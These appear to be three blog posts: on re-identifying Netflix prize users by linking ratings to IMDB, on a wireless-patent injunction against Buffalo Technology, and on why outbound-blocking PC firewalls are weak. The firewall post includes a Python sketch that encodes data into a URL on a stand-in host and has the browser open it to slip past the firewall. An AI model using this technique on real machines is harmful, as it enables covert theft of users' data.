Netflix prize data and the meaning of anonymity

Last week a paper from the University of Texas titled How to Break Anonymity of the Netflix Dataset was Slashdotted. In the ensuing discussion parallels were drawn to the release of AOL search data, and commenters asked whether this would finally put the kibosh on any future release of user data for research purposes. The results are very interesting but do not quite support such a drastic conclusion. In particular the notion of “anonymity” used in the paper, while satisfactory from a mathematical point of view, is not consistent with the working definition most users have in mind.

To recap: In 2006 Netflix announced a one-million dollar prize to improve its recommendation service. The problem is deceptively simple to state: given a user’s past movie ratings, suggest other movies he/she will enjoy. This is a standard collaborative-filtering and machine-learning problem, and the solutions depend on access to massive amounts of training data. More data allows the algorithms to model user behavior at a very nuanced level and improve their predictions. Netflix was up to the challenge, releasing a very large dataset containing 100 million ratings from half a million users– almost one out of every eight customers at the time. This dataset was “anonymized” according to the Netflix definition: customers were identified by numbers only– no names, no personally identifiable information, not even demographic data such as age, gender or education, which may actually have been useful for predictions.

On the surface, the new paper shows that users can in fact be identified from this stripped-down data– this is the interpretation that fueled the Slashdot speculation. Reality is more complex: the main quantitative result of the paper is that the movie ratings of an individual are highly distinctive. (The dataset is “sparse,” to use the proper language.) In fact they are so distinctive that two people are unlikely to agree in their ratings for even a handful of movies. The effect is even more pronounced when the movies are obscure– knowing that a user watched an obscure Ingmar Bergman film already sets them apart from the crowd.

Looked at another way: suppose there is a large source of movie ratings, as in the Netflix prize dataset. If the goal is to locate a particular user whose identity has been masked, getting hold of just a few of their ratings from another source is enough. Even among millions of users, there is unlikely to be a second person with exactly the same tastes. In some ways this is intuitive, but the important contribution of the paper is quantifying the effect and calculating exactly how much data is required for unique identification with high confidence. The answer: fewer than a dozen movie ratings– fewer still if the movies are obscure, or if the dates of the ratings are also available. (Indirectly the dates are in the Netflix dataset, as the date the user provided each rating.)
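The linkage idea can be illustrated with a toy sketch. This is not the paper’s actual algorithm– the real attack tolerates approximate matches and perturbed dates– and the user numbers, titles and ratings below are made up for illustration. The point is simply that matching a few known (movie, rating) pairs against a large anonymized release can already narrow the field to a single record:

```python
# Hypothetical anonymized release: user number -> {movie title: rating}.
released = {
    1234: {"The Seventh Seal": 5, "Wild Strawberries": 4, "Top Gun": 2},
    1235: {"Top Gun": 5, "Die Hard": 5},
    1236: {"The Seventh Seal": 5, "Die Hard": 3},
}

def candidates(aux_ratings, data):
    """Return the ids of users whose released ratings agree with every
    (movie, rating) pair known from the auxiliary source."""
    return [uid for uid, ratings in data.items()
            if all(ratings.get(movie) == score
                   for movie, score in aux_ratings.items())]

# Two ratings of obscure titles already single out one record.
print(candidates({"The Seventh Seal": 5, "Wild Strawberries": 4}, released))
# -> [1234]
```

With realistic data the same effect holds at scale: because the rating matrix is so sparse, a handful of constraints is usually enough to leave exactly one candidate.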

“From another source” is the critical caveat above. In the paper this is referred to as the auxiliary data source. What the paper demonstrates is that the Netflix dataset can be linked to another dataset. Linking can be a serious privacy problem: it allows aggregating information from different databases. If a database existed where personally identifiable information was stored along with a small number of movie ratings, those records could be matched against the Netflix data. Here is the catch: there is no such database. As the auxiliary source for mounting the attack, the paper uses the Internet Movie Database, or IMDB, where users volunteer movie reviews. That allows correlating the reviews a user posted on IMDB with all of their other ratings in the Netflix data. As for the typical user profile on IMDB, the registration page asks for email address, gender, year of birth, zip code and country– all of them volunteered by the user and subject to no validation. This is the “90210” phenomenon: any time data is mandatory without good reason and there is no way to enforce accuracy, the service provider ends up with many people named “John Smith” living in Hollywood, zip code 90210, CA. The effect of linking the IMDB and Netflix data, then, is to discover that a user nicknamed Mickey Mouse is a fan of Disney movies. Unless the user volunteered more data to IMDB, the correlation does not get us any closer to that subscriber’s offline identity. All of the arguments about inferring sensitive information from movie ratings still hold (for example, political affiliation based on the response to a controversial documentary), but the data is now associated with user “MickeyMouse” instead of user #1234 in the original source. A step closer to identification? Perhaps. Fully identified? Not even close.

By itself the Netflix dataset is not dangerous. That is a sharp contrast with the earlier AOL search data disaster: search history is sufficient on its own to uniquely identify users, because individuals enter private information such as their legal name or address into search queries. More importantly, there is no limit to what search logs can contain: queries for health conditions can be used to infer medical data, searches for news may suggest professional interests, and so on.

cemp

Buffalo Technology is latest target of IP litigation

Visitors looking for wireless products on the Buffalo Technology website will instead see this message:

Regrettably, the Court of Appeals has decided not to stay the injunction in the CSIRO v. Buffalo et al litigation during the appeal period. Although Buffalo is confident that the final decision in the appeal will be favorable and that the injunction will be lifted, Buffalo is presently unable to supply wireless LAN equipment compliant with IEEE 802.11a and 802.11g standards in the United States until that decision is issued.

Fortunately this does not affect customers who have already bought devices: manuals and firmware updates are still available, even for the verboten product lines. Interestingly enough, the injunction only covers A and G devices, so a pure draft-N router would still qualify in principle. But since all of the draft-N routers also include A/B/G support for backwards compatibility, this stops Buffalo from shipping any wireless product, for all intents and purposes. It is not clear what the impact on the company will be. They have a diversified line of products including external drives, network-attached storage and even multimedia, but the current litigation might affect even some of those devices, such as wireless print servers.

cemp

Security theater, act#48: outbound blocking firewalls for PCs

Users running XP SP2, Vista or a third-party firewall client such as ZoneAlarm have probably seen this warning: “… such-and-such program attempted to make a connection to the Internet and was blocked.” This is supposed to create a warm and fuzzy feeling for users: here is a message indicating that some shady application running on the computer attempted to do something sketchy, but the clever security system caught it and prevented harm. The reality is a bit different.

First, to be clear: firewalls are very important for defense in depth. (Although there are alternative security paradigms, such as the Jericho Forum, that seek to dispense with them altogether.) The main function of a firewall is to block inbound connections– in other words, to stop other computers “out there” in the wild-wild web from attempting to access resources on the machine “here.” Used this way the firewall is the first line of defense; even when an access attempt seems harmless– “surely it would be denied!”– there is no reason to take risks. Exploitable bugs in access-control software have caused machines to be compromised simply by connecting to them. The further upstream one can detect and block such an attempt, the better.

But outbound blocking is an altogether different function. In this case there is some software already running inside the trust boundary, admitted into the inner sanctum, and the firewall prevents that code from communicating with the outside world. What purpose does that serve? With the exception of parental controls– which is rarely the intended effect– the answer is “not much.” The reason is that blocking assumes malicious intent on the part of the application. Perhaps it is trying to connect to some nefarious host out there and do something dubious, such as ship private user documents off to Russia or download more malware. The problem is that once malicious code is running with the same privileges as the user, it is very hard to cut off all of its communication channels to the outside world, for one basic reason: processes and applications do not have strong identity.

While the host-based firewall attempts to create the illusion that application X is highly regarded and application Y is not to be trusted with talking to the outside world, in reality it has a very hard time telling them apart. This is because applications are not intended to be an isolation boundary in an operating system; they are not protected from each other. A simple example: if Y is not allowed to open an outbound connection, it can often launch a copy of X to do the same thing instead, or– prior to Vista– subvert the internal workings of X. For “X” substitute Internet Explorer: launching a URL is sending information to a website. In fact malware authors have already implemented a more reliable form of this strategy: when they need to phone home, say to download a new copy of the botnet software, they use the Background Intelligent Transfer Service (BITS), as documented by Symantec. BITS is a trusted operating-system component and has no problem bypassing the firewall, even when acting under orders from malware. There was a minor stir when this news initially surfaced, including articles at the Register and the BBC. In fact it should have been greeted with a yawn, were it not for the firewall itself setting unrealistic expectations about what can be accomplished in the way of outbound blocking.
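The launch-a-trusted-program trick is simple enough to sketch. The host name and helper below are hypothetical, and the sketch defaults to a dry run that only shows the command it would launch: a “blocked” program never touches the network itself, it merely hands a crafted URL to the system’s URL handler, and the browser– which the firewall trusts– makes the connection.

```python
import subprocess
from urllib.parse import urlencode

def exfiltrate_via_browser(secret, dry_run=True):
    """Smuggle data out by encoding it into a URL and asking a trusted
    program (the default browser) to open it. Hypothetical host name."""
    url = "http://collector.example.com/?" + urlencode({"d": secret})
    # xdg-open on Linux; the equivalent would be `open` on macOS or
    # `start` on Windows.
    cmd = ["xdg-open", url]
    if dry_run:
        return cmd              # just show what would be launched
    subprocess.Popen(cmd)       # the *browser* makes the connection

print(exfiltrate_via_browser("user document contents"))
# -> ['xdg-open', 'http://collector.example.com/?d=user+document+contents']
```

From the firewall’s point of view the only process opening a connection is the browser, which is on the allow list– exactly the identity problem described above.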

cemp